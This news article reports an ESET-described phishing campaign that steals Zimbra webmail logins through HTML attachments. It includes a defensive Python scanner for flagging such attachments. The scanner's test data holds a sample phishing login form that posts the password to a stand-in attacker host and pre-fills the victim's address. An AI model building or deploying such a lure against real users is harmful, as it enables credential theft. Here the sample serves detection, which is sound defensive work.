New credential stealing campaign targets Zimbra email accounts

A phishing email notifies users about an upcoming email server update that could lead to temporary account deactivation

Image: New phishing campaign targets Zimbra email server accounts to steal login credentials

Since at least April 2023, an ongoing phishing campaign has been targeting users of Zimbra Collaboration email servers in order to steal their login credentials, which are then used in follow-on operations.

Zimbra is a collaborative software suite encompassing an email server alongside a web client interface.

As outlined in an ESET report, an unidentified threat actor has been sending phishing emails to organisations worldwide since April 2023, with no apparent focus on any particular sector or entity.

The majority of organisations targeted by the actor are situated in Poland, Ecuador, Mexico, Italy and Russia.

The phishing email appears to come from a Zimbra administrator, warning users of an upcoming email server update that could lead to temporary account deactivation or a similar problem.

Recipients are prompted to open an attached HTML file for further details on the server upgrade and to review guidelines for preventing account deactivation.

The HTML file contains a Zimbra login page that has been carefully customised for the targeted organisation.

The Username field is pre-populated with the victim's email address, which makes the page look authentic.

When the victim enters a password, it is harvested from the HTML form and sent in an HTTPS POST request to a server controlled by the attacker.

ESET's findings reveal that in certain cases, the attackers employ compromised administrator accounts to establish fresh mailboxes. These newly created mailboxes are then used for spreading phishing emails to other members within the targeted organisation.

Although the campaign lacks technical complexity, its strategy hinges on "the fact that HTML attachments contain legitimate code," and "the only telltale element is a link pointing to the malicious host," said ESET researcher Viktor Šperka.

"This way, it is much easier to circumvent reputation-based antispam policies, compared to phishing techniques where a malicious link is directly placed in the email body," he added.

"The popularity of Zimbra Collaboration among organisations expected to have lower IT budgets ensures that it stays an attractive target for adversaries."
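Because the attachment is otherwise legitimate-looking HTML, the practical detection hook is the one Šperka describes: where the page sends what the user types. The following scanner is an added example written for this article (it is not ESET's tooling or part of Zimbra) that parses an HTML attachment, collects every form action and inline-script URL, and flags any host that is not the organisation's own webmail host, a password field inside an attachment, and a pre-filled username. The sample attachment, the hostnames `mail.victim.example` and `mail-update.example.net`, and the address `jane.doe@victim.example` are all constructed for the demonstration.

```python
"""Flag HTML email attachments that carry a credential-harvesting login form.

Added example, not code from the article, ESET or Zimbra. Hostnames and the
sample attachment below are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Absolute URLs hidden in inline scripts (e.g. a fetch()/XMLHttpRequest POST).
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


class AttachmentScanner(HTMLParser):
    """Collect every place an HTML attachment could send typed data to."""

    def __init__(self):
        super().__init__()
        self.form_actions = []      # action= of each <form>
        self.password_inputs = 0    # number of <input type="password">
        self.prefilled_emails = []  # text inputs whose value looks like an address
        self.script_urls = []       # src= of <script> tags plus URLs inside inline scripts
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser already lowercases names
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input":
            if a.get("type", "text").lower() == "password":
                self.password_inputs += 1
            elif "@" in a.get("value", ""):
                self.prefilled_emails.append(a["value"])
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_urls.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # <script> bodies arrive here as raw text; pull out any absolute URL.
        if self._in_script:
            self.script_urls.extend(URL_RE.findall(data))


def scan_attachment(html, trusted_hosts):
    """Return a verdict and human-readable findings for one HTML attachment."""
    trusted = {h.lower() for h in trusted_hosts}
    parser = AttachmentScanner()
    parser.feed(html)
    parser.close()

    findings = []
    for url in parser.form_actions:
        host = (urlparse(url).hostname or "").lower()
        if host and host not in trusted:
            findings.append(f"form posts to untrusted host {host}")
    for url in parser.script_urls:
        host = (urlparse(url).hostname or "").lower()
        if host and host not in trusted:
            findings.append(f"script references untrusted host {host}")
    if parser.password_inputs:
        findings.append(
            f"password field inside an email attachment ({parser.password_inputs})")
    for addr in parser.prefilled_emails:
        findings.append(f"username pre-filled with {addr}")

    # A password field that submits to a host we do not own is the campaign's signature.
    untrusted = any("untrusted host" in f for f in findings)
    if parser.password_inputs and untrusted:
        verdict = "credential-phish"
    elif parser.password_inputs:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings}


# Constructed sample data: the organisation's real webmail host and a lure
# modelled on the attachment described in the article.
TRUSTED_HOSTS = {"mail.victim.example"}

SAMPLE_PHISH = """<html><head><title>Zimbra Web Client Sign In</title>
<script src="https://static.mail-update.example.net/zimbra.js"></script>
</head><body>
<form method="post" action="https://mail-update.example.net/zimbra/login">
  <input type="text" name="username" value="jane.doe@victim.example">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>"""

SAMPLE_BENIGN = """<html><body><p>Maintenance window: Saturday 02:00-04:00.</p>
<a href="https://mail.victim.example/">Open webmail</a></body></html>"""

if __name__ == "__main__":
    for name, doc in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        result = scan_attachment(doc, TRUSTED_HOSTS)
        print(name, result["verdict"], *result["findings"], sep="\n  ")
```

The scanner deliberately ignores relative form actions: an attachment opened from disk cannot reach a server with a relative URL, so a working credential harvester in an attachment needs an absolute URL, which is exactly what the check keys on. Feeding it the HTML attachments a mail gateway strips off is enough to surface this campaign's lures without any signature for the page content itself.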

To avoid compromise, ESET recommends sticking to fundamental security practices: using strong passwords, enabling multi-factor authentication, and upgrading to the latest version of the software.

Attackers frequently target Zimbra Collaboration email servers, either to harvest internal communications or to use them as an initial foothold for moving into the targeted organisation's network.

Earlier this year, Proofpoint disclosed that the Russian hacking group known as 'Winter Vivern' took advantage of a vulnerability within Zimbra Collaboration to gain entry into the webmail interfaces of organisations aligned with NATO, governments, diplomats, and military personnel.

Last month, Zimbra publicly acknowledged a cross-site scripting (XSS) vulnerability within its Zimbra Collaboration Suite.

Maddie Stone, a researcher from Google Threat Analysis Group, claimed at the time that the flaw was actively exploited by attackers.